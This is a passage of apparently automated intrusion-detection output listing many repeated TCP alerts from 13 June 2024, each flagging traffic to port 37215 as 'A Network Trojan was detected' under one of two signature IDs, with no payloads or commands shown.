              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727350
              SID:2835222
              Source Port:37528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258135
              SID:2835222
              Source Port:41690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987596
              SID:2829579
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039833
              SID:2835222
              Source Port:43260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990705
              SID:2829579
              Source Port:52012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996387
              SID:2835222
              Source Port:52582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989207
              SID:2829579
              Source Port:59552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044542
              SID:2835222
              Source Port:40124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424922
              SID:2835222
              Source Port:39118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012842
              SID:2829579
              Source Port:48866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843657
              SID:2835222
              Source Port:38120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752181
              SID:2829579
              Source Port:51080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273604
              SID:2835222
              Source Port:36604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128500
              SID:2829579
              Source Port:55448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638360
              SID:2835222
              Source Port:46526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611302
              SID:2829579
              Source Port:42492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837182
              SID:2835222
              Source Port:37698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869275
              SID:2829579
              Source Port:59352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545672
              SID:2835222
              Source Port:51238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676697
              SID:2835222
              Source Port:44768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754929
              SID:2829579
              Source Port:49472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078397
              SID:2829579
              Source Port:44848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954026
              SID:2829579
              Source Port:36784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455794
              SID:2835222
              Source Port:58916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440920
              SID:2829579
              Source Port:40632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133278
              SID:2835222
              Source Port:42918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824686
              SID:2829579
              Source Port:34700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487537
              SID:2835222
              Source Port:39778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278055
              SID:2835222
              Source Port:36906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307444
              SID:2835222
              Source Port:39428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416500
              SID:2835222
              Source Port:49158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970017
              SID:2829579
              Source Port:60676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244209
              SID:2829579
              Source Port:57948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160449
              SID:2829579
              Source Port:56582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831522
              SID:2835222
              Source Port:55292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573154
              SID:2835222
              Source Port:42998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224988
              SID:2835222
              Source Port:35380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165891
              SID:2829579
              Source Port:42848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404622
              SID:2835222
              Source Port:34324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198142
              SID:2835222
              Source Port:42642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075630
              SID:2835222
              Source Port:45606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347597
              SID:2835222
              Source Port:54706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078233
              SID:2835222
              Source Port:40826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259041
              SID:2835222
              Source Port:60522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995541
              SID:2835222
              Source Port:33648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.125842
              SID:2829579
              Source Port:46734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670934
              SID:2829579
              Source Port:51722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375235
              SID:2829579
              Source Port:60384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252987
              SID:2835222
              Source Port:37332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567790
              SID:2835222
              Source Port:33568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418982
              SID:2829579
              Source Port:49662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657453
              SID:2829579
              Source Port:54542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553324
              SID:2829579
              Source Port:52562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972802
              SID:2835222
              Source Port:42802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.944072
              SID:2835222
              Source Port:55844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227491
              SID:2835222
              Source Port:33928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554015
              SID:2829579
              Source Port:53834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241838
              SID:2835222
              Source Port:38980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678109
              SID:2835222
              Source Port:40484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310604
              SID:2829579
              Source Port:48224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453829
              SID:2829579
              Source Port:45992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527715
              SID:2835222
              Source Port:54800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195706
              SID:2835222
              Source Port:37438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456861
              SID:2835222
              Source Port:42294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458174
              SID:2829579
              Source Port:55890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676382
              SID:2829579
              Source Port:58434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992187
              SID:2829579
              Source Port:49628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631055
              SID:2835222
              Source Port:54916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222316
              SID:2835222
              Source Port:54526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605278
              SID:2829579
              Source Port:53226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636222
              SID:2829579
              Source Port:51668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525735
              SID:2829579
              Source Port:41812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246193
              SID:2829579
              Source Port:57886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695071
              SID:2829579
              Source Port:46228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501879
              SID:2829579
              Source Port:60932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710737
              SID:2829579
              Source Port:39980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075395
              SID:2829579
              Source Port:50872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501585
              SID:2829579
              Source Port:52362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078946
              SID:2829579
              Source Port:42954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153028
              SID:2829579
              Source Port:50526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696720
              SID:2829579
              Source Port:37070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016797
              SID:2829579
              Source Port:37412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568704
              SID:2829579
              Source Port:55526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992367
              SID:2835222
              Source Port:56292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230668
              SID:2835222
              Source Port:46392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609492
              SID:2829579
              Source Port:60594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503392
              SID:2829579
              Source Port:40440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256576
              SID:2835222
              Source Port:43574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252373
              SID:2829579
              Source Port:50246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754555
              SID:2835222
              Source Port:43584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992459
              SID:2829579
              Source Port:55456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568996
              SID:2835222
              Source Port:33840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937412
              SID:2835222
              Source Port:57902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439249
              SID:2829579
              Source Port:56266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125385
              SID:2835222
              Source Port:44114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707785
              SID:2835222
              Source Port:42292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940449
              SID:2829579
              Source Port:57476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633180
              SID:2829579
              Source Port:37614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043563
              SID:2829579
              Source Port:35620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095060
              SID:2829579
              Source Port:45818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273305
              SID:2829579
              Source Port:32982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127085
              SID:2835222
              Source Port:49930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502901
              SID:2835222
              Source Port:58506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088278
              SID:2829579
              Source Port:39442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271127
              SID:2829579
              Source Port:56878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194632
              SID:2835222
              Source Port:41584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214230
              SID:2829579
              Source Port:54528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507931
              SID:2835222
              Source Port:59418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909296
              SID:2829579
              Source Port:37452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543479
              SID:2835222
              Source Port:52790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995735
              SID:2829579
              Source Port:52524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128013
              SID:2829579
              Source Port:47276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.628825
              SID:2835222
              Source Port:57214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321663
              SID:2835222
              Source Port:47576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783576
              SID:2835222
              Source Port:44574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421767
              SID:2835222
              Source Port:46252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212861
              SID:2835222
              Source Port:51180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613040
              SID:2829579
              Source Port:55178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130641
              SID:2829579
              Source Port:51032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756479
              SID:2835222
              Source Port:35864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300304
              SID:2829579
              Source Port:54622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416805
              SID:2835222
              Source Port:40960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802391
              SID:2829579
              Source Port:51444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675510
              SID:2835222
              Source Port:39664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301964
              SID:2829579
              Source Port:57020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943912
              SID:2835222
              Source Port:38694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305686
              SID:2829579
              Source Port:60600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995897
              SID:2829579
              Source Port:36050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404551
              SID:2829579
              Source Port:34576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402151
              SID:2835222
              Source Port:46126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303018
              SID:2835222
              Source Port:44526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436534
              SID:2835222
              Source Port:43314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109872
              SID:2829579
              Source Port:42114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478174
              SID:2829579
              Source Port:48826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804958
              SID:2829579
              Source Port:37666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300838
              SID:2829579
              Source Port:59808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659855
              SID:2835222
              Source Port:53580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657854
              SID:2835222
              Source Port:59452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137874
              SID:2835222
              Source Port:44128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454980
              SID:2829579
              Source Port:34378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568941
              SID:2829579
              Source Port:43566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887526
              SID:2829579
              Source Port:40772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245846
              SID:2829579
              Source Port:60702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676157
              SID:2835222
              Source Port:57752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078864
              SID:2835222
              Source Port:45354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632543
              SID:2829579
              Source Port:47982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308028
              SID:2835222
              Source Port:36280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551498
              SID:2829579
              Source Port:60526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708184
              SID:2829579
              Source Port:40562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303115
              SID:2829579
              Source Port:54024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.131299
              SID:2835222
              Source Port:43322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485276
              SID:2835222
              Source Port:46016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094126
              SID:2835222
              Source Port:38076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348313
              SID:2829579
              Source Port:39184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166920
              SID:2835222
              Source Port:51786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013753
              SID:2835222
              Source Port:33846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305206
              SID:2829579
              Source Port:38676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256289
              SID:2835222
              Source Port:59510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247650
              SID:2829579
              Source Port:39680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756418
              SID:2829579
              Source Port:36028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756316
              SID:2835222
              Source Port:35034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044882
              SID:2829579
              Source Port:57972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507230
              SID:2829579
              Source Port:55904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086705
              SID:2835222
              Source Port:57942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995157
              SID:2829579
              Source Port:38140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403386
              SID:2835222
              Source Port:59216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824220
              SID:2835222
              Source Port:37840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631135
              SID:2835222
              Source Port:52924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458696
              SID:2835222
              Source Port:55322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359747
              SID:2829579
              Source Port:54992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343845
              SID:2829579
              Source Port:53516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868638
              SID:2829579
              Source Port:46100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838949
              SID:2829579
              Source Port:59164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728443
              SID:2829579
              Source Port:55348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942624
              SID:2835222
              Source Port:47938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972013
              SID:2829579
              Source Port:35194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308477
              SID:2829579
              Source Port:53376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129315
              SID:2835222
              Source Port:36836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056917
              SID:2835222
              Source Port:35706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170206
              SID:2829579
              Source Port:46028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403194
              SID:2829579
              Source Port:44598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633444
              SID:2835222
              Source Port:46920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730554
              SID:2835222
              Source Port:44234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245438
              SID:2829579
              Source Port:48656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214348
              SID:2829579
              Source Port:46248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014635
              SID:2835222
              Source Port:33958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400596
              SID:2829579
              Source Port:51188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196114
              SID:2829579
              Source Port:52662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224495
              SID:2829579
              Source Port:49756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544880
              SID:2829579
              Source Port:53406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805058
              SID:2835222
              Source Port:44386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309404
              SID:2835222
              Source Port:35784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565471
              SID:2829579
              Source Port:44806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165259
              SID:2829579
              Source Port:51658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269479
              SID:2835222
              Source Port:55848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546716
              SID:2835222
              Source Port:46202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752631
              SID:2829579
              Source Port:44254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
